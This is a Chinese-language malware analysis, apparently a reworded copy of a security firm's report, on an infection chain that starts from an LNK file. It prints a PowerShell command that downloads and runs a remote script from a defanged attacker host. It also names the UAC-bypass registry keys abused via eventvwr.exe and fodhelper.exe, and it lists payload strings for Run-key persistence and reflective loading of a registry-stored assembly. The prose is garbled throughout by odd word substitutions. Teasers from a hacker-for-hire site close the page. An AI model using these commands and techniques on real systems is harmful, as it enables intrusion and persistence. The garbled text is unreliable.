几天前,Cybaze-Yoroi ZLab安全团队遇到了一类风趣的感染链,它运用多种杂乱技能,能够绕过传统安全防御机制并躲藏其payload,对方针用户形成严重威胁。
整个感染链始于一个LNK文件,运用LNK文件进行进犯是APT安排常常运用的技能之一,因而咱们决议对这些歹意样本进行更深化的研讨,在研讨进程中,咱们还发现了另一个早被用滥的开源项目,许多时分, *** 犯罪分子会在其间植入歹意软件。
技能剖析
感染链的来源是一个简略的LNK文件,旨在经过以下指令从长途方位下载并运转名为“rdp.ps1”的PowerShell文件:
C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -ExecutionPolicy Bypass -Windo 1 $wm=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWVY'));sal g $wm;$IF=((New-Object Net.WebClient)).DownloadString('https://hacks4all[.net/rdp.ps1');g $I
检索到的Powershell脚本是整个感染链的dropper。
此Powershell脚本首要运用“Get-WmiObject -Class Win32_OperatingSystem | Select-Object -ExpandProperty Version”指令检索方针核算机上装置的Windows操作系统的版别。接着依据回来的值,运用一些相应的权限提高缝隙,以绕过UAC(用户帐户操控)功用——这是自Windows Vista起引进的一种安全机制,能够防止未经授权的系统配置更改。脚本的首要方针就是在版别低于8.1的Windows中,运用EventViewer进程上的规划缺点来履行具有更高特权的指令。
对此缝隙的运用进程是十分简单的:歹意软件能够拜访注册表项“HKCU: Software Classes mscfile shell open command”,并在此处刺进指令,经过强制履行“eventvwr.exe”进程来运转其payload,因为安全缝隙,能够以更高权限运转该进程。
图1:查看方针Windows版别并为eventvwr.exe进程缝隙运用做准备
第二个缝隙则涉及到Windows 10操作系统:是FODhelper进程中的一个缝隙。此缝隙运用的原理与前一个相似,但拜访的注册表项是“HKCU: Software Classes ms-settings Shell Open command”,而受进犯的进程则是“fodhelper.exe”。
图2:查看方针Windows版别并为fodhelper.exe进程缝隙运用做准备
之后运转Powershell payload,payload在解码后会调用额定的JavaScript代码。这个脚本的主体包括一个嵌入其他子函数的专一匿名函数和一个很大的含糊变量。
图3:以Base64格局编码的payload,与自定义子程序混杂
图4:子程序去混杂后的部分代码
它的payload是一个参数化的Powershell脚本,意图是将终究payload装置到用户注册表hive中,然后完毕感染链。
[
"Wscript.Shell",
"scriptfullname",
"scriptname",
"powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command ",
"%",
"ExpandEnvironmentStrings",
"Temp",
"",
"fromCharCode",
"[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('Temp')+'",
"',[System.IO.File]::ReadAllText('",
"'));wscript '",
"'",
"Run",
"Quit",
"New-ItemProperty -Path 'HKCU:SoftwareMicrosoftWindowsCurrentVersionRun' -name 'FileName' -value '",
"' -PropertyType String -Force;",
"[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'",
"'))",
" ##### FINAL PAYLOAD ##### "
"HKCUSOFTWAREMicrosoft\Winkey",
"Scripting.FileSystemObject",
"REG_SZ",
"regwrite",
"$_b = (get-itemproperty -path 'HKCU:SOFTWAREMicrosoft' -name 'Winkey').Winkey;$_b=$_b.replace('~','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
[1] [2] 黑客接单网
0×01 前语 在最近的歹意软件的查询中,咱们发现了一些风趣的混杂JavaScript代码。此代码伪装成现在盛行的插件AddThis social sharing的一部分,在URL命名约好和图画文件中...
事实上,互联网上每时每刻都在上演着进犯和防护,本文将会要点的深化剖析一下其间一个非常重要的类型:webshell。 初识webshell 接下来将演示3种黑客是怎么用力浑身解数将webshell上传...
nginx lua模块淘宝开发的nginx第三方模块,它能将lua言语嵌入到nginx装备中,然后运用lua就极大增强了nginx的才能.nginx以高并发而闻名,lua脚本简便,两者的调配可谓完...
现在,最新的DVWA现已更新到1.9版别(http://www.dvwa.co.uk/),而网上的教程大多停留在旧版别,并且没有针对DVWA high等级的教程,因而萌发了一个编撰新手教程的主意,过错...
跟着各种网络技能不断发展,黑客关于网站进犯也总是不断改换战略以及通过相互之间的交流来改善进犯技能。而事实上就现在网站安全方面,面对的应战首要也正是来自于进犯技能不断的演进,使得防护也需不断晋级。在之...
布景 在互联网职业,Google将安全做到基础设施里边,从来是各大公司学习的典范,在Web方面,经过GFE (Google Front-End) 一致对外发布,事务只需求在GFE挂号,GFE就会调取正...